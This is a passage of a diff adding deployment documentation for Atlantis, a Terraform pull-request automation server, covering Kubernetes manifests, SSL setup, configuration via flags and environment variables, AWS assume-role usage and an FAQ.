+        fsGroup: 1000 # Atlantis group (1000) read/write access to volumes.
+      containers:
+      - name: atlantis
+        image: runatlantis/atlantis:v<VERSION> # 1. Replace <VERSION> with the most recent release.
+        env:
+        - name: ATLANTIS_REPO_WHITELIST
+          value: github.com/yourorg/* # 2. Replace this with your own repo whitelist.
+
+        ### GitHub Config ###
+        - name: ATLANTIS_GH_USER
+          value: <YOUR_GITHUB_USER> # 3i. If you're using GitHub replace <YOUR_GITHUB_USER> with the username of your Atlantis GitHub user without the `@`.
+        - name: ATLANTIS_GH_TOKEN
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: token
+        - name: ATLANTIS_GH_WEBHOOK_SECRET
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: webhook-secret
+
+        ### GitLab Config ###
+        - name: ATLANTIS_GITLAB_USER
+          value: <YOUR_GITLAB_USER> # 4i. If you're using GitLab replace <YOUR_GITLAB_USER> with the username of your Atlantis GitLab user without the `@`.
+        - name: ATLANTIS_GITLAB_TOKEN
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: token
+        - name: ATLANTIS_GITLAB_WEBHOOK_SECRET
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: webhook-secret
+
+        - name: ATLANTIS_DATA_DIR
+          value: /atlantis
+        - name: ATLANTIS_PORT
+          value: "4141" # Kubernetes sets an ATLANTIS_PORT variable so we need to override.
+        volumeMounts:
+        - name: atlantis-data
+          mountPath: /atlantis
+        ports:
+        - name: atlantis
+          containerPort: 4141
+        resources:
+          requests:
+            memory: 256Mi
+            cpu: 100m
+          limits:
+            memory: 256Mi
+            cpu: 100m
+  volumeClaimTemplates:
+  - metadata:
+      name: atlantis-data
+    spec:
+      accessModes: ["ReadWriteOnce"] # Volume should not be shared by multiple nodes.
+      resources:
+        requests:
+          # The biggest thing Atlantis stores is the Git repo when it checks it out.
+          # It deletes the repo after the pull request is merged.
+          storage: 5Gi
+---
+apiVersion: v1
+kind: Service
+metadata:
+  name: atlantis
+spec:
+  ports:
+  - name: atlantis
+    port: 80
+    targetPort: 4141
+  selector:
+    app: atlantis
+```
+</details>
+
+
+#### Deployment Manifest
+<details>
+ <summary>Expand...</summary>
+
+```yaml
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: atlantis
+  labels:
+    app: atlantis
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app: atlantis
+  template:
+    metadata:
+      labels:
+        app: atlantis
+    spec:
+      containers:
+      - name: atlantis
+        image: runatlantis/atlantis:v<VERSION> # 1. Replace <VERSION> with the most recent release.
+        env:
+        - name: ATLANTIS_REPO_WHITELIST
+          value: github.com/yourorg/* # 2. Replace this with your own repo whitelist.
+
+        ### GitHub Config ###
+        - name: ATLANTIS_GH_USER
+          value: <YOUR_GITHUB_USER> # 3i. If you're using GitHub replace <YOUR_GITHUB_USER> with the username of your Atlantis GitHub user without the `@`.
+        - name: ATLANTIS_GH_TOKEN
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: token
+        - name: ATLANTIS_GH_WEBHOOK_SECRET
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: webhook-secret
+
+        ### GitLab Config ###
+        - name: ATLANTIS_GITLAB_USER
+          value: <YOUR_GITLAB_USER> # 4i. If you're using GitLab replace <YOUR_GITLAB_USER> with the username of your Atlantis GitLab user without the `@`.
+        - name: ATLANTIS_GITLAB_TOKEN
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: token
+        - name: ATLANTIS_GITLAB_WEBHOOK_SECRET
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: webhook-secret
+        - name: ATLANTIS_PORT
+          value: "4141" # Kubernetes sets an ATLANTIS_PORT variable so we need to override.
+        ports:
+        - name: atlantis
+          containerPort: 4141
+        resources:
+          requests:
+            memory: 256Mi
+            cpu: 100m
+          limits:
+            memory: 256Mi
+            cpu: 100m
+---
+apiVersion: v1
+kind: Service
+metadata:
+  name: atlantis
+spec:
+  ports:
+  - name: atlantis
+    port: 80
+    targetPort: 4141
+  selector:
+    app: atlantis
+```
+</details>
+
+#### Routing and SSL
+The manifests above create a Kubernetes `Service` of type `ClusterIP` which isn't accessible outside your cluster.
+Depending on how you're doing routing into Kubernetes, you may want to use a `LoadBalancer` so that Atlantis is accessible
+to GitHub/GitLab and your internal users.
+
+If you want to add SSL you can use something like https://github.com/jetstack/cert-manager to generate SSL
+certs and mount them into the Pod. Then set the `ATLANTIS_SSL_CERT_FILE` and `ATLANTIS_SSL_KEY_FILE` environment variables to enable SSL.
+You could also set up SSL at your LoadBalancer.
+
+### AWS Fargate
+
+If you'd like to run Atlantis on [AWS Fargate](https://aws.amazon.com/fargate/) check out the Atlantis module on the Terraform Module Registry: https://registry.terraform.io/modules/terraform-aws-modules/atlantis/aws
+
+### Testing Out Atlantis on GitHub
+
+If you'd like to test out Atlantis before running it on your own repositories you can fork our example repo.
+
+- Fork https://github.com/runatlantis/atlantis-example
+- If you didn't add the Webhook as to your organization add Atlantis as a Webhook to the forked repo (see [Add GitHub Webhook](#add-github-webhook))
+- Now that Atlantis can receive events you should be able to comment on a pull request to trigger Atlantis. Create a pull request
+	- Click **Branches** on your forked repo's homepage
+	- click the **New pull request** button next to the `example` branch
+	- Change the `base` to `{your-repo}/master`
+	- click **Create pull request**
+- Now you can test out Atlantis
+	- Create a comment `atlantis help` to see what commands you can run from the pull request
+	- `atlantis plan` will run `terraform plan` behind the scenes. You should see the output commented back on the pull request. You should also see some logs show up where you're running `atlantis server`
+	- `atlantis apply` will run `terraform apply`. Since our pull request creates a `null_resource` (which does nothing) this is safe to do.
+
+## Server Configuration
+Configuration for `atlantis server` can be specified via command line flags, environment variables or a YAML config file.
+Config file values are overridden by environment variables which in turn are overridden by flags.
+
+### YAML
+To use a yaml config file, run atlantis with `--config /path/to/config.yaml`.
+The keys of your config file should be the same as the flag, ex.
+```yaml
+---
+gh-token: ...
+log-level: ...
+```
+
+### Environment Variables
+All flags can be specified as environment variables. You need to convert the flag's `-`'s to `_`'s, uppercase all the letters and prefix with `ATLANTIS_`.
+For example, `--gh-user` can be set via the environment variable `ATLANTIS_GH_USER`.
+
+To see a list of all flags and their descriptions run `atlantis server --help`
+
+## AWS Credentials
+Atlantis simply shells out to `terraform` so you don't need to do anything special with AWS credentials.
+As long as `terraform` works where you're hosting Atlantis, then Atlantis will work.
+See https://www.terraform.io/docs/providers/aws/#authentication for more detail.
+
+### Multiple AWS Accounts
+Atlantis supports multiple AWS accounts through the use of Terraform's
+[AWS Authentication](https://www.terraform.io/docs/providers/aws/#authentication).
+
+If you're using the [Shared Credentials file](https://www.terraform.io/docs/providers/aws/#shared-credentials-file)
+you'll need to ensure the server that Atlantis is executing on has the corresponding credentials file.
+
+If you're using [Assume role](https://www.terraform.io/docs/providers/aws/#assume-role)
+you'll need to ensure that the credentials file has a `default` profile that is able
+to assume all required roles.
+
+[Environment variables](https://www.terraform.io/docs/providers/aws/#environment-variables) authentication
+won't work for multiple accounts since Atlantis wouldn't know which environment variables to execute
+Terraform with.
+
+### Assume Role Session Names
+Atlantis injects the Terraform variable `atlantis_user` and sets it to the GitHub username of
+the user that is running the Atlantis command. This can be used to dynamically name the assume role
+session. This is used at Hootsuite so AWS API actions can be correlated with a specific user.
+
+To take advantage of this feature, use Terraform's [built-in support](https://www.terraform.io/docs/providers/aws/#assume-role) for assume role
+and use the `atlantis_user` terraform variable
+
+```hcl
+provider "aws" {
+  assume_role {
+    role_arn     = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"
+    session_name = "${var.atlantis_user}"
+  }
+}
+
+# need to define the atlantis_user variable to avoid terraform errors
+variable "atlantis_user" {
+  default = "atlantis_user"
+}
+```
+
+If you're also using the [S3 Backend](https://www.terraform.io/docs/backends/types/s3.html)
+make sure to add the `role_arn` option:
+
+```hcl
+terraform {
+  backend "s3" {
+    bucket   = "mybucket"
+    key      = "path/to/my/key"
+    region   = "us-east-1"
+    role_arn = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"
+    # can't use var.atlantis_user as the session name because
+    # interpolations are not allowed in backend configuration
+    # session_name = "${var.atlantis_user}" WON'T WORK
+  }
+}
+```
+
+Terraform doesn't support interpolations in backend config so you will not be
+able to use `session_name = "${var.atlantis_user}"`. However, the backend assumed
+role is only used for state-related API actions. Any other API actions will be performed using
+the assumed role specified in the `aws` provider and will have the session named as the GitHub user.
+
+## Glossary
+#### Project
+A Terraform project. Multiple projects can be in a single GitHub repo.
+We identify a project by its repo **and** the path to the root of the project within that repo.
+
+#### Workspace/Environment
+A Terraform workspace. See [terraform docs](https://www.terraform.io/docs/state/workspaces.html) for more information.
+
+## FAQ
+**Q: Does Atlantis affect Terraform [remote state](https://www.terraform.io/docs/state/remote.html)?**
+
+A: No. Atlantis does not interfere with Terraform remote state in any way. Under the hood, Atlantis is simply executing `terraform plan` and `terraform apply`.
+
+**Q: How does Atlantis locking interact with Terraform [locking](https://www.terraform.io/docs/state/locking.html)?**
+
+A: Atlantis provides locking of pull requests that prevents concurrent modification of the same infrastructure (Terraform project) whereas Terraform locking only prevents two concurrent `terraform apply`'s from happening.
+
+Terraform locking can be used alongside Atlantis locking since Atlantis is simply executing terraform commands.
+
+**Q: How to run Atlantis in high availability mode? Does it need to be?**
+
+A: Atlantis server can easily be run under the supervision of a init system like `upstart` or `systemd` to make sure `atlantis server` is always running.
+
+Atlantis currently stores all locking and Terraform plans locally on disk under the `--data-dir` directory (defaults to `~/.atlantis`). Because of this there is currently no way to run two or more Atlantis instances concurrently.
+
+However, if you were to lose the data, all you would need to do is run `atlantis plan` again on the pull requests that are open. If someone tries to run `atlantis apply` after the data has been lost then they will get an error back, so they will have to re-plan anyway.
+
+**Q: How to add SSL to Atlantis server?**
+
+A: First, you'll need to get a public/private key pair to serve over SSL.
+These need to be in a directory accessible by Atlantis. Then start `atlantis server` with the `--ssl-cert-file` and `--ssl-key-file` flags.
+See `atlantis server --help` for more information.
+
+**Q: How can I get Atlantis up and running on AWS?**
 
-## Documentation
-[www.runatlantis.io/docs](https://www.runatlantis.io/docs)
+A: There is [terraform-aws-atlantis](https://github.com/terraform-aws-modules/terraform-aws-atlantis) project where complete Terraform configurations for running Atlantis on AWS Fargate are hosted. Tested and maintained.
 
 ## Contributing
 Want to contribute? Check out [CONTRIBUTING](https://github.com/runatlantis/atlantis/blob/master/CONTRIBUTING.md).